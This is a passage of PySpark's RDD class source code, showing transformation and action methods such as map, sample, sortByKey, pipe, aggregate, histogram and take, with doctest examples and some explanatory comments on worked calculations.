Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
        Gets the name of the file to which this RDD was checkpointed.
        Not defined if the RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
        Returns the number of partitions in this RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
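        # Worked example (editorial): weights=[2, 3] normalize to
        # cweights=[0.0, 0.4, 1.0], so the two resulting RDDs roughly keep the
        # elements whose per-element random draw falls in [0.0, 0.4) and
        # [0.4, 1.0) respectively.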
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
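    # Worked example (editorial, approximate): for sampleSizeLowerBound=100 and
    # total=10000 without replacement, fraction = 0.01 and
    # gamma = -log(0.00005) / 10000 ~= 9.9e-4, so the returned rate is
    # 0.01 + 9.9e-4 + sqrt(gamma**2 + 2 * gamma * 0.01) ~= 0.0155, i.e. about a
    # 1.55% sampling rate to obtain at least 100 elements with ~99.99% probability.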
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
        # we have numPartitions parts, but one of them has
        # an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
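        # Illustrative example (editorial): with numPartitions=4 and 100 sorted
        # sample keys, the bounds are samples[25], samples[50] and samples[75];
        # rangePartitioner below then bisects a key into one of the 4 ranges
        # (reversed when ascending is False).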
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
        The function C{op(t1, t2)} is allowed to modify C{t1} and return it
        as its result value to avoid object allocation; however, it should not
        modify C{t2}.
        The first function (seqOp) can return a different result type, U, than
        the type of this RDD. Thus, we need one operation for merging a T into
        a U and one operation for merging two U's
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
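        # Illustrative walk-through (editorial): with 100 partitions and depth=2,
        # scale = ceil(100 ** 0.5) = 10; the loop runs once (100 > 10 + 10),
        # shrinking to 10 partitions, then stops (10 is not > 10 + 1), and the
        # final reduce(combOp) merges the remaining 10 values on the driver.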
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
        this can be switched from an O(log n) insertion to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
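            # Editorial example: with even buckets [0, 25, 50] (inc=25), the
            # value 50 maps to index int((50 - 0) / 25) = 2; folding the last
            # two counters together puts it into the final, right-closed
            # bucket [25, 50].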
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
        It works by first scanning one partition, and using the results from
        that partition to estimate the number of additional partitions needed
        to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
                    # the first parameter of max is >= 1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
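            # Worked example (editorial): asking for num=100 and getting 20 items
            # from the first partition gives
            # numPartsToTry = int(1.5 * 100 * 1 / 20) - 1 = 6, capped to
            # min(max(6, 1), 1 * 4) = 4, so the next pass scans 4 partitions.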
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
